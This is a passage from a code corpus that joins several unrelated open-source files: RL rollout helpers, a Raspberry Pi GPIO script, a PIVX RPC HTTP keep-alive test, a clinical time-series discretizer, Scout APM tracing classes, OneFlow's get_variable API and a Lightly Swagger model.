self.k_opp_loss[k_to_explore - 1] <= self.debit_threshold_wt_multiplier)
return found_k
def _compute_opp_total_reward_loss(self, k_to_explore, worker, policy_map, policy_agent_mapping, last_obs):
# Cooperative rollouts
coop_mean_total_reward, n_steps_played = self._compute_opp_mean_total_reward(worker, policy_map,
policy_agent_mapping,
partially_coop=False,
opp_action=None,
last_obs=last_obs)
# Cooperative rollouts with first action as the real one
partially_coop_mean_total_reward, _ = self._compute_opp_mean_total_reward(worker, policy_map,
policy_agent_mapping,
partially_coop=False,
opp_action=None, last_obs=last_obs,
k_to_explore=k_to_explore)
opp_total_reward_loss = coop_mean_total_reward - partially_coop_mean_total_reward
if self.verbose > 0:
print(f"partially_coop_mean_total_reward {partially_coop_mean_total_reward}")
print(f"coop_mean_total_reward {coop_mean_total_reward}")
print(f"opp_total_reward_loss {opp_total_reward_loss}")
return opp_total_reward_loss, n_steps_played
def _compute_opp_mean_total_reward(self, worker, policy_map, policy_agent_mapping, partially_coop: bool,
opp_action, last_obs, k_to_explore=0):
opp_total_rewards = []
for i in range(self.n_rollout_replicas // 2):
self.n_steps_to_punish = k_to_explore
self.n_steps_to_punish_opponent = k_to_explore
if partially_coop:
assert len(self.overwrite_action) == 0
self.overwrite_action = [(np.array([opp_action]), [], {}), ]
coop_rollout = rollout.internal_rollout(worker,
num_steps=self.rollout_length,
policy_map=policy_map,
last_obs=last_obs,
policy_agent_mapping=policy_agent_mapping,
reset_env_before=False,
num_episodes=1)
assert coop_rollout._num_episodes == 1, f"coop_rollout._num_episodes {coop_rollout._num_episodes}"
epi = coop_rollout._current_rollout
opp_rewards = [step[3][self.opp_policy_id] for step in epi]
# print("rewards", rewards)
opp_total_reward = sum(opp_rewards)
opp_total_rewards.append(opp_total_reward)
# print("total_rewards", total_rewards)
self.n_steps_to_punish = 0
self.n_steps_to_punish_opponent = 0
n_steps_played = len(epi)
opp_mean_total_reward = sum(opp_total_rewards) / len(opp_total_rewards)
return opp_mean_total_reward, n_steps_played
|
the-stack_0_25231
|
import RPi.GPIO as GPIO
import time
import threading
GPIO.setmode(GPIO.BCM)
BB = 17
GPIO.setup(BB,GPIO.OUT)
def Scan():
time.sleep(1)
GPIO.output(BB,True)
time.sleep(1)
GPIO.output(BB,False)
#code = input()
time.sleep(0.1)
return 0
#def GetCode():
# code = input("Code:")
# print(code)
# time.sleep(1)
#thread1 = threading.Thread(target = GetCode,args=())
#thread2 = threading.Thread(target = Scan,args=())
#thread1.start()
#time.sleep(1)
#thread2.start()
#thread1.join()
#thread2.join()
|
the-stack_0_25232
|
#!/usr/bin/env python3
# Copyright (c) 2014-2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the RPC HTTP basics."""
from test_framework.test_framework import PivxTestFramework
from test_framework.util import *
import http.client
import urllib.parse
class HTTPBasicsTest (PivxTestFramework):
def set_test_params(self):
self.num_nodes = 3
def setup_network(self):
self.setup_nodes()
def run_test(self):
#################################################
# lowlevel check for http persistent connection #
#################################################
url = urllib.parse.urlparse(self.nodes[0].url)
authpair = url.username + ':' + url.password
headers = {"Authorization": "Basic " + str_to_b64str(authpair)}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1)
assert(conn.sock!=None) #according to http/1.1 connection must still be open!
#send 2nd request without closing connection
conn.request('POST', '/', '{"method": "getchaintips"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1) #must also response with a correct json-rpc message
assert(conn.sock!=None) #according to http/1.1 connection must still be open!
conn.close()
#same should be if we add keep-alive because this should be the std. behaviour
headers = {"Authorization": "Basic " + str_to_b64str(authpair), "Connection": "keep-alive"}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1)
assert(conn.sock!=None) #according to http/1.1 connection must still be open!
#send 2nd request without closing connection
conn.request('POST', '/', '{"method": "getchaintips"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1) #must also response with a correct json-rpc message
assert(conn.sock!=None) #according to http/1.1 connection must still be open!
conn.close()
#now do the same with "Connection: close"
headers = {"Authorization": "Basic " + str_to_b64str(authpair), "Connection":"close"}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1)
assert(conn.sock==None) #now the connection must be closed after the response
#node1 (2nd node) is running with disabled keep-alive option
urlNode1 = urllib.parse.urlparse(self.nodes[1].url)
authpair = urlNode1.username + ':' + urlNode1.password
headers = {"Authorization": "Basic " + str_to_b64str(authpair)}
conn = http.client.HTTPConnection(urlNode1.hostname, urlNode1.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1)
#node2 (third node) is running with standard keep-alive parameters which means keep-alive is on
urlNode2 = urllib.parse.urlparse(self.nodes[2].url)
authpair = urlNode2.username + ':' + urlNode2.password
headers = {"Authorization": "Basic " + str_to_b64str(authpair)}
conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1)
assert(conn.sock!=None) #connection must be closed because pivxd should use keep-alive by default
# Check excessive request size
conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port)
conn.connect()
conn.request('GET', '/' + ('x'*1000), '', headers)
out1 = conn.getresponse()
assert_equal(out1.status, http.client.NOT_FOUND)
conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port)
conn.connect()
conn.request('GET', '/' + ('x'*10000), '', headers)
out1 = conn.getresponse()
assert_equal(out1.status, http.client.BAD_REQUEST)
if __name__ == '__main__':
HTTPBasicsTest ().main ()
|
the-stack_0_25233
|
from __future__ import absolute_import
from __future__ import print_function
import numpy as np
import platform
import pickle
import json
import os
class Discretizer:
def __init__(self, timestep=0.8, store_masks=True, impute_strategy='zero', start_time='zero',
config_path=os.path.join(os.path.dirname(__file__), 'resources/discretizer_config_more_features.json')):
with open(config_path) as f:
config = json.load(f)
self._id_to_channel = config['id_to_channel']
self._channel_to_id = dict(zip(self._id_to_channel, range(len(self._id_to_channel))))
self._is_categorical_channel = config['is_categorical_channel']
self._possible_values = config['possible_values']
self._normal_values = config['normal_values']
self._header = ["Hours"] + self._id_to_channel
self._timestep = timestep
self._store_masks = store_masks
self._start_time = start_time
self._impute_strategy = impute_strategy
# for statistics
self._done_count = 0
self._empty_bins_sum = 0
self._unused_data_sum = 0
def get_header(self):
new_header = []
for channel in self._id_to_channel:
if self._is_categorical_channel[channel]:
values = self._possible_values[channel]
for value in values:
new_header.append(channel + "->" + value)
else:
new_header.append(channel)
if self._store_masks:
for i in range(len(self._id_to_channel)):
channel = self._id_to_channel[i]
new_header.append("mask->" + channel)
return new_header
def transform(self, X, header=None, end=None):
if header is None:
header = self._header
assert header[0] == "Hours"
eps = 1e-6
N_channels = len(self._id_to_channel)
ts = [float(row[0]) for row in X]
for i in range(len(ts) - 1):
assert ts[i] < ts[i+1] + eps
if self._start_time == 'relative':
first_time = ts[0]
elif self._start_time == 'zero':
first_time = 0
else:
raise ValueError("start_time is invalid")
if end is None:
max_hours = max(ts) - first_time
else:
max_hours = end - first_time
N_bins = int(max_hours / self._timestep + 1.0 - eps)
cur_len = 0
begin_pos = [0 for i in range(N_channels)]
end_pos = [0 for i in range(N_channels)]
for i in range(N_channels):
channel = self._id_to_channel[i]
begin_pos[i] = cur_len
if self._is_categorical_channel[channel]:
end_pos[i] = begin_pos[i] + len(self._possible_values[channel])
else:
end_pos[i] = begin_pos[i] + 1
cur_len = end_pos[i]
data = np.zeros(shape=(N_bins, cur_len), dtype=float)
mask = np.zeros(shape=(N_bins, N_channels), dtype=int)
original_value = [["" for j in range(N_channels)] for i in range(N_bins)]
total_data = 0
unused_data = 0
def write(data, bin_id, channel, value, begin_pos):
def scrub_input(value):
'''
Remove all non numeric characters from a numerical input
'''
val = ''.join(c for c in value if (c.isdigit() or c == '.'))
#Handle case where '.' was used in val with no numbers
try:
return float(val)
except:
return 0.0
channel_id = self._channel_to_id[channel]
if self._is_categorical_channel[channel]:
category_id = self._possible_values[channel].index(value)
N_values = len(self._possible_values[channel])
one_hot = np.zeros((N_values,))
one_hot[category_id] = 1
for pos in range(N_values):
data[bin_id, begin_pos[channel_id] + pos] = one_hot[pos]
else:
value=scrub_input(value)
data[bin_id, begin_pos[channel_id]] = float(value)
for row in X:
t = float(row[0]) - first_time
if t > max_hours + eps:
continue
bin_id = int(t / self._timestep - eps)
assert 0 <= bin_id < N_bins
for j in range(1, len(row)):
if row[j] == "":
continue
channel = header[j]
channel_id = self._channel_to_id[channel]
total_data += 1
if mask[bin_id][channel_id] == 1:
unused_data += 1
mask[bin_id][channel_id] = 1
write(data, bin_id, channel, row[j], begin_pos)
original_value[bin_id][channel_id] = row[j]
# impute missing values
if self._impute_strategy not in ['zero', 'normal_value', 'previous', 'next']:
raise ValueError("impute strategy is invalid")
if self._impute_strategy in ['normal_value', 'previous']:
prev_values = [[] for i in range(len(self._id_to_channel))]
for bin_id in range(N_bins):
for channel in self._id_to_channel:
channel_id = self._channel_to_id[channel]
if mask[bin_id][channel_id] == 1:
prev_values[channel_id].append(original_value[bin_id][channel_id])
continue
if self._impute_strategy == 'normal_value':
imputed_value = self._normal_values[channel]
if self._impute_strategy == 'previous':
if len(prev_values[channel_id]) == 0:
imputed_value = self._normal_values[channel]
else:
imputed_value = prev_values[channel_id][-1]
write(data, bin_id, channel, imputed_value, begin_pos)
if self._impute_strategy == 'next':
prev_values = [[] for i in range(len(self._id_to_channel))]
for bin_id in range(N_bins-1, -1, -1):
for channel in self._id_to_channel:
channel_id = self._channel_to_id[channel]
if mask[bin_id][channel_id] == 1:
prev_values[channel_id].append(original_value[bin_id][channel_id])
continue
if len(prev_values[channel_id]) == 0:
imputed_value = self._normal_values[channel]
else:
imputed_value = prev_values[channel_id][-1]
write(data, bin_id, channel, imputed_value, begin_pos)
empty_bins = np.sum([1 - min(1, np.sum(mask[i, :])) for i in range(N_bins)])
self._done_count += 1
self._empty_bins_sum += empty_bins / (N_bins + eps)
self._unused_data_sum += unused_data / (total_data + eps)
if self._store_masks:
data = np.hstack([data, mask.astype(np.float32)])
# create new header
new_header = []
for channel in self._id_to_channel:
if self._is_categorical_channel[channel]:
values = self._possible_values[channel]
for value in values:
new_header.append(channel + "->" + value)
else:
new_header.append(channel)
if self._store_masks:
for i in range(len(self._id_to_channel)):
channel = self._id_to_channel[i]
new_header.append("mask->" + channel)
new_header = ",".join(new_header)
return (data, new_header)
def print_statistics(self):
print("statistics of discretizer:")
print("\tconverted {} examples".format(self._done_count))
print("\taverage unused data = {:.2f} percent".format(100.0 * self._unused_data_sum / self._done_count))
print("\taverage empty bins = {:.2f} percent".format(100.0 * self._empty_bins_sum / self._done_count))
class Normalizer:
def __init__(self, fields=None):
self._means = None
self._stds = None
self._fields = None
if fields is not None:
self._fields = [col for col in fields]
self._sum_x = None
self._sum_sq_x = None
self._count = 0
def _feed_data(self, x):
x = np.array(x)
self._count += x.shape[0]
if self._sum_x is None:
self._sum_x = np.sum(x, axis=0)
self._sum_sq_x = np.sum(x**2, axis=0)
else:
self._sum_x += np.sum(x, axis=0)
self._sum_sq_x += np.sum(x**2, axis=0)
def _save_params(self, save_file_path):
eps = 1e-7
with open(save_file_path, "wb") as save_file:
N = self._count
self._means = 1.0 / N * self._sum_x
self._stds = np.sqrt(1.0/(N - 1) * (self._sum_sq_x - 2.0 * self._sum_x * self._means + N * self._means**2))
self._stds[self._stds < eps] = eps
pickle.dump(obj={'means': self._means,
'stds': self._stds},
file=save_file,
protocol=2)
def load_params(self, load_file_path):
with open(load_file_path, "rb") as load_file:
if platform.python_version()[0] == '2':
dct = pickle.load(load_file)
else:
dct = pickle.load(load_file, encoding='latin1')
self._means = dct['means']
self._stds = dct['stds']
def transform(self, X):
if self._fields is None:
fields = range(X.shape[1])
else:
fields = self._fields
ret = 1.0 * X
for col in fields:
ret[:, col] = (X[:, col] - self._means[col]) / self._stds[col]
return ret
|
the-stack_0_25235
|
from __future__ import absolute_import, division, print_function, unicode_literals
import logging
from datetime import datetime
from uuid import uuid4
import scout_apm.core.backtrace
from scout_apm.core.n_plus_one_call_set import NPlusOneCallSet
from scout_apm.core.request_manager import RequestManager
from scout_apm.core.samplers import Memory, Samplers
from scout_apm.core.thread_local import ThreadLocalSingleton
try:
from scout_apm.core import objtrace
except ImportError:
objtrace = None
logger = logging.getLogger(__name__)
class TrackedRequest(ThreadLocalSingleton):
"""
This is a container which keeps track of all module instances for a single
request. For convenience they are made available as attributes based on
their keyname
"""
def __init__(self, *args, **kwargs):
self.req_id = "req-" + str(uuid4())
self.start_time = kwargs.get("start_time", datetime.utcnow())
self.end_time = kwargs.get("end_time", None)
self.active_spans = kwargs.get("active_spans", [])
self.complete_spans = kwargs.get("complete_spans", [])
self.tags = kwargs.get("tags", {})
self.real_request = kwargs.get("real_request", False)
self.memory_start = kwargs.get("memory_start", Memory.rss_in_mb())
self.callset = NPlusOneCallSet()
logger.debug("Starting request: %s", self.req_id)
def mark_real_request(self):
self.real_request = True
def is_real_request(self):
return self.real_request
def tag(self, key, value):
if key in self.tags:
logger.debug(
"Overwriting previously set tag for request %s: %s", self.req_id, key
)
self.tags[key] = value
def start_span(self, *args, **kwargs):
maybe_parent = self.current_span()
if maybe_parent is not None:
parent_id = maybe_parent.span_id
if maybe_parent.ignore_children:
kwargs["ignore"] = True
kwargs["ignore_children"] = True
else:
parent_id = None
kwargs["parent"] = parent_id
kwargs["request_id"] = self.req_id
new_span = Span(**kwargs)
self.active_spans.append(new_span)
return new_span
def stop_span(self):
try:
stopping_span = self.active_spans.pop()
except IndexError as e:
logger.debug("Exception when stopping span: %r", e)
else:
stopping_span.stop()
if not stopping_span.ignore:
stopping_span.annotate()
self.complete_spans.append(stopping_span)
if len(self.active_spans) == 0:
self.finish()
def current_span(self):
if len(self.active_spans) > 0:
return self.active_spans[-1]
else:
return None
# Request is done, release any info we have about it.
def finish(self):
logger.debug("Stopping request: %s", self.req_id)
if self.end_time is None:
self.end_time = datetime.utcnow()
if self.is_real_request():
self.tag("mem_delta", Memory.get_delta(self.memory_start))
if not self.is_ignored():
RequestManager.instance().add_request(self)
Samplers.ensure_running()
# This can fail if the Tracked Request was created directly,
# not through instance()
try:
self.release()
except Exception:
pass
# A request is ignored if the tag "ignore_transaction" is set to True
def is_ignored(self):
return self.tags.get("ignore_transaction", False)
class Span(object):
def __init__(self, *args, **kwargs):
self.span_id = kwargs.get("span_id", "span-" + str(uuid4()))
self.start_time = kwargs.get("start_time", datetime.utcnow())
self.end_time = kwargs.get("end_time", None)
self.request_id = kwargs.get("request_id", None)
self.operation = kwargs.get("operation", None)
self.ignore = kwargs.get("ignore", False)
self.ignore_children = kwargs.get("ignore_children", False)
self.parent = kwargs.get("parent", None)
self.tags = kwargs.get("tags", {})
if objtrace is not None:
self.start_objtrace_counts = kwargs.get(
"start_objtrace_counts", objtrace.get_counts()
)
else:
self.start_objtrace_counts = kwargs.get(
"start_objtrace_counts", (0, 0, 0, 0)
)
self.end_objtrace_counts = kwargs.get("end_objtrace_counts", (0, 0, 0, 0))
def stop(self):
self.end_time = datetime.utcnow()
if objtrace is not None:
self.end_objtrace_counts = objtrace.get_counts()
else:
self.end_objtrace_counts = (0, 0, 0, 0)
def tag(self, key, value):
if key in self.tags:
logger.debug(
"Overwriting previously set tag for span %s: %s", self.span_id, key
)
self.tags[key] = value
# In seconds
def duration(self):
if self.end_time is not None:
return (self.end_time - self.start_time).total_seconds()
else:
# Current, running duration
return (datetime.utcnow() - self.start_time).total_seconds()
# Add any interesting annotations to the span. Assumes that we are in the
# process of stopping this span.
def annotate(self):
self.tag("allocations", self.calculate_allocations())
# Don't capture backtraces for Controller or Middleware
if self.operation is not None:
if self.operation.startswith("Controller") or self.operation.startswith(
"Middleware"
):
return
slow_threshold = 0.500
if self.duration() > slow_threshold:
self.capture_backtrace()
def calculate_allocations(self):
if objtrace is None:
return 0
start_allocs = (
self.start_objtrace_counts[0]
+ self.start_objtrace_counts[1]
+ self.start_objtrace_counts[2]
)
end_allocs = (
self.end_objtrace_counts[0]
+ self.end_objtrace_counts[1]
+ self.end_objtrace_counts[2]
)
try:
# If even one of the counters rolled over, we're pretty much
# guaranteed to have end_allocs be less than start_allocs.
# This should rarely happen. Max Unsigned Long Long is a big number
if end_allocs - start_allocs < 0:
logger.debug(
"End allocation count smaller than start allocation "
"count for span %s: start = %d, end = %d",
self.span_id,
start_allocs,
end_allocs,
)
return 0
return end_allocs - start_allocs
except TypeError as e:
logger.debug("Exception in calculate_allocations: %r", e)
return 0
def capture_backtrace(self):
stack = scout_apm.core.backtrace.capture()
self.tag("stack", stack)
|
the-stack_0_25241
|
"""
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
from typing import Optional, Sequence, Union
import oneflow._oneflow_internal
from oneflow._oneflow_internal.oneflow.core.register import logical_blob_id as lbi_util
from oneflow.compatible import single_client as flow
from oneflow.compatible.single_client.eager import boxing_util as boxing_util
from oneflow.compatible.single_client.eager import gradient_util as gradient_util
from oneflow.compatible.single_client.eager import op_executor as op_executor
from oneflow.compatible.single_client.experimental import namescope as name_scope
from oneflow.compatible.single_client.framework import (
compile_context as compile_context,
)
from oneflow.compatible.single_client.framework import distribute as distribute_util
from oneflow.compatible.single_client.framework import hob as hob
from oneflow.compatible.single_client.framework import remote_blob as remote_blob_util
from oneflow.compatible.single_client.framework import runtime_mode as rt_mode
from oneflow.compatible.single_client.framework import session_context as session_ctx
from oneflow.compatible.single_client.support import enable_if as enable_if
from oneflow.core.job import initializer_conf_pb2 as initializer_conf_util
from oneflow.core.job import regularizer_conf_pb2 as regularizer_conf_util
from oneflow.core.operator import op_conf_pb2 as op_conf_util
from oneflow.core.register import logical_blob_id_pb2 as logical_blob_id_util
blob_register = oneflow._oneflow_internal.GetDefaultBlobRegister()
def api_get_variable(
name: str,
shape: Optional[Sequence[int]] = None,
dtype: Optional[flow.dtype] = flow.float32,
initializer: Optional[initializer_conf_util.InitializerConf] = None,
regularizer: Optional[regularizer_conf_util.RegularizerConf] = None,
trainable: Optional[bool] = None,
model_name: Optional[str] = None,
random_seed: Optional[int] = None,
parallel_distribution: Optional[
Union[
Sequence[oneflow._oneflow_internal.distribute.Distribute],
Sequence[str],
str,
]
] = None,
distribute: Optional[oneflow._oneflow_internal.distribute.Distribute] = None,
reuse: bool = True,
) -> oneflow._oneflow_internal.BlobDesc:
"""Create a variable or retrieve an existing one.
Args:
name: Name of this variable. One variable could be shared by multiple OneFlow functions. `None` by default
shape: Shape of the variable. `None` by default
dtype: Data type of the variable. `None` by default
initializer: A initializer object. For instance, a :func:`~oneflow.compatible.single_client.ones_initializer`. `None` by default
trainable: A `bool` to indicate if this variable is trainable. `True` by default
model_name: A `string`. `'weight'` or `'bias'`. `None` by default
random_seed: Random seed for random initializers. `None` by default
For example:
Example 1:
.. code-block:: python
import oneflow.compatible.single_client as flow
import oneflow.compatible.single_client.typing as tp
def watch_handler(y: tp.Numpy):
print("out", y)
@flow.global_function()
def variable_Job() -> None:
init = flow.constant_initializer(1.25)
variable = flow.get_variable(
"variable-weight",
shape=(1, 3, 2, 2),
initializer=init,
trainable=True
)
flow.watch(variable, watch_handler)
checkpoint = flow.train.CheckPoint()
checkpoint.init()
variable_Job()
# out [[[[1.25 1.25]
# [1.25 1.25]]
# [[1.25 1.25]
# [1.25 1.25]]
# [[1.25 1.25]
# [1.25 1.25]]]]
Example 2:
.. code-block:: python
import oneflow.compatible.single_client as flow
import numpy as np
import oneflow.compatible.single_client.typing as tp
def conv2d(input, filters, kernel_size, strides, padding, name):
input_shape = input.shape
weight_initializer = flow.truncated_normal(0.1)
weight_regularizer = flow.regularizers.l2(0.0005)
weight_shape = (filters,
input_shape[1],
kernel_size[0],
kernel_size[1])
weight = flow.get_variable(
name + "-weight",
shape=weight_shape,
initializer=weight_initializer,
regularizer=weight_regularizer,
)
return flow.nn.conv2d(input, weight, strides, padding, name=name)
@flow.global_function()
def conv2d_Job(x: tp.Numpy.Placeholder((1, 64, 32, 32))
) -> tp.Numpy:
conv = conv2d(x,
filters=128,
kernel_size=[3, 3],
strides=2,
padding='SAME',
name="ConvLayer")
return conv
x = np.random.randn(1, 64, 32, 32).astype(np.float32)
out = conv2d_Job(x)
# out.shape (1, 128, 16, 16)
"""
if distribute is not None:
assert parallel_distribution is None
parallel_distribution = [distribute]
if parallel_distribution is None:
parallel_distribution = []
if isinstance(parallel_distribution, str):
parallel_distribution = parallel_distribution.split(",")
assert isinstance(parallel_distribution, (list, tuple))
def distribute_to_str(dist):
if dist is None:
return ""
elif type(dist) is str:
return dist
elif type(dist) is oneflow._oneflow_internal.distribute.SplitDistribute:
return "S({})".format(dist.axis)
elif type(dist) is oneflow._oneflow_internal.distribute.BroadcastDistribute:
return "B"
else:
raise ValueError("unsupported distribute")
parallel_distribution = list(map(distribute_to_str, parallel_distribution))
api = enable_if.unique([get_lazy_variable, get_eager_variable])
return api(
name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
trainable=trainable,
model_name=model_name,
random_seed=random_seed,
parallel_distribution=parallel_distribution,
reuse=reuse,
)
@enable_if.condition(hob.in_global_mode & hob.eager_execution_enabled)
def get_eager_variable(
name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=None,
model_name=None,
random_seed=None,
parallel_distribution=None,
reuse=True,
):
assert isinstance(name, str)
assert isinstance(
shape, (list, tuple)
), "param shape should be a list or tuple of dimension"
job_name = oneflow._oneflow_internal.JobBuildAndInferCtx_GetCurrentJobName()
name = name_scope.GetJobNameScopePrefix(job_name) + name
sess = session_ctx.GetDefaultSession()
(var_blob, job_var_blob) = sess.TryGetVariableBlobOfJobFromStash(job_name, name)
if reuse is False:
assert (
job_var_blob is None
), "variable '{}' already exists, getting the same variable is not allowed when reuse is False".format(
name
)
if job_var_blob is None:
op_conf = GenerateVariableOpConf(
name=name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
trainable=trainable,
model_name=model_name,
random_seed=random_seed,
parallel_distribution=parallel_distribution,
)
op_attribute = compile_context.CurJobAddConsistentOp(op_conf)
if var_blob is None:
var_blob = CreateEagerVariableBlob(op_attribute)
op_executor.EagerInitVariableBlob(sess, op_conf, var_blob)
assert isinstance(var_blob, oneflow._oneflow_internal.EagerConsistentBlob)
sess.StashVariableBlob4Job(job_name, op_conf.name, var_blob)
else:
assert isinstance(job_var_blob, oneflow._oneflow_internal.EagerConsistentBlob)
assert isinstance(var_blob, oneflow._oneflow_internal.EagerConsistentBlob)
assert var_blob.IdenticalTo(job_var_blob)
bw_blob_register = gradient_util.GetDefaultBackwardBlobRegister()
bw_blob_register.TrySetObject4BlobName(
var_blob.logical_blob_name, var_blob.blob_object
)
return var_blob
@enable_if.condition(hob.in_global_mode & ~hob.eager_execution_enabled)
def get_lazy_variable(
name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=None,
model_name=None,
random_seed=None,
parallel_distribution=None,
reuse=True,
):
assert isinstance(name, str)
assert isinstance(
shape, (list, tuple)
), "param shape should be a list or tuple of dimension"
job_name = oneflow._oneflow_internal.JobBuildAndInferCtx_GetCurrentJobName()
name = name_scope.GetJobNameScopePrefix(job_name) + name
sess = session_ctx.GetDefaultSession()
(var_blob, job_var_blob) = sess.TryGetVariableBlobOfJobFromStash(job_name, name)
if reuse is False:
assert (
job_var_blob is None
), "variable '{}' already exists, getting the same variable is not allowed when param reuse is False".format(
name
)
if job_var_blob is None:
op_conf = GenerateVariableOpConf(
name=name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
trainable=trainable,
model_name=model_name,
random_seed=random_seed,
parallel_distribution=parallel_distribution,
)
job_var_blob = _CreateVariableBlob(op_conf)
assert isinstance(job_var_blob, oneflow._oneflow_internal.LazyConsistentBlob)
sess.StashVariableBlob4Job(job_name, op_conf.name, job_var_blob)
if var_blob is not None:
assert isinstance(var_blob, oneflow._oneflow_internal.LazyConsistentBlob)
assert var_blob.IdenticalTo(job_var_blob)
else:
assert isinstance(job_var_blob, oneflow._oneflow_internal.LazyConsistentBlob)
assert isinstance(var_blob, oneflow._oneflow_internal.LazyConsistentBlob)
assert var_blob.IdenticalTo(job_var_blob)
return job_var_blob
def GenerateVariableOpConf(
name,
shape,
dtype=None,
initializer=None,
regularizer=None,
trainable=None,
model_name=None,
random_seed=None,
parallel_distribution=None,
):
op_conf = op_conf_util.OperatorConf()
op_conf.name = name
op_conf.variable_conf.shape.dim.extend(shape)
assert dtype is not None
op_conf.variable_conf.data_type = oneflow._oneflow_internal.deprecated.GetProtoDtype4OfDtype(
dtype
)
if rt_mode.CurrentMode() == rt_mode.NORMAL_MODE:
root_path = None
else:
root_path = (
compile_context.GetCurJobConfigProto().default_initialize_with_snapshot_path()
)
dir_path = os.path.join(root_path, name)
file_path = os.path.join(dir_path, "out")
if root_path and os.path.isfile(file_path):
op_conf.variable_conf.initialize_with_snapshot.path = dir_path
op_conf.variable_conf.initialize_with_snapshot.key = "out"
else:
if root_path:
print("{} not found, will be initialized".format(file_path))
if initializer is not None:
op_conf.variable_conf.initializer.CopyFrom(initializer)
if regularizer is not None:
op_conf.variable_conf.regularizer.CopyFrom(regularizer)
if trainable is not None:
op_conf.variable_conf.trainable = trainable
if model_name is not None:
op_conf.variable_conf.model_name = model_name
if parallel_distribution is None:
parallel_distribution = []
op_conf.variable_conf.parallel_distribution.extend(parallel_distribution)
if random_seed is not None:
op_conf.variable_conf.random_seed = random_seed
op_conf.variable_conf.out = "out"
return op_conf
def _CreateVariableBlob(op_conf):
compile_context.CurJobAddConsistentOp(op_conf)
lbi = logical_blob_id_util.LogicalBlobId()
lbi.op_name = op_conf.name
lbi.blob_name = op_conf.variable_conf.out
return remote_blob_util.RemoteBlob(lbi)
def CreateEagerVariableBlob(op_attribute, job_name=""):
bn_in_op2blob_object = oneflow._oneflow_internal.deprecated.BnInOp2BlobObject()
def BuildInstruction(builder):
parallel_conf = flow.current_scope().device_parallel_desc_symbol.parallel_conf
cfg_op_attribute = oneflow._oneflow_internal.deprecated.MakeOpAttributeByString(
str(op_attribute)
)
builder.StatelessCall(
cfg_op_attribute, parallel_conf, bn_in_op2blob_object, boxing_util.BoxingTo
)
oneflow._oneflow_internal.deprecated.LogicalRun(BuildInstruction)
lbi = lbi_util.LogicalBlobId()
lbi.set_op_name(op_attribute.op_conf.name)
lbi.set_blob_name(op_attribute.op_conf.variable_conf.out)
if not isinstance(lbi, lbi_util.LogicalBlobId):
cfg_lbi = lbi_util.LogicalBlobId()
cfg_lbi.set_op_name(lbi.op_name)
cfg_lbi.set_blob_name(lbi.blob_name)
lbi = cfg_lbi
return oneflow._oneflow_internal.EagerConsistentBlob(
lbi,
blob_object=bn_in_op2blob_object["out"],
blob_register=blob_register,
job_name=job_name,
)
|
the-stack_0_25246
|
# coding: utf-8
"""
Lightly API
Lightly.ai enables you to do self-supervised learning in an easy and intuitive way. The lightly.ai OpenAPI spec defines how one can interact with our REST API to unleash the full potential of lightly.ai # noqa: E501
OpenAPI spec version: 1.0.0
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from lightly.openapi_generated.swagger_client.configuration import Configuration
class TaskName(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
}
attribute_map = {
}
def __init__(self, _configuration=None): # noqa: E501
"""TaskName - a model defined in Swagger""" # noqa: E501
if _configuration is None:
_configuration = Configuration()
self._configuration = _configuration
self.discriminator = None
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(TaskName, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, TaskName):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, TaskName):
return True
return self.to_dict() != other.to_dict()
|
the-stack_0_25249
|
import base64
import hmac
from collections import defaultdict
from django import forms
from django.contrib import messages
from django.db import transaction
from django.db.models import Count, Exists, OuterRef
from django.http import Http404, HttpResponse
from django.shortcuts import redirect, get_object_or_404
from django.urls import reverse
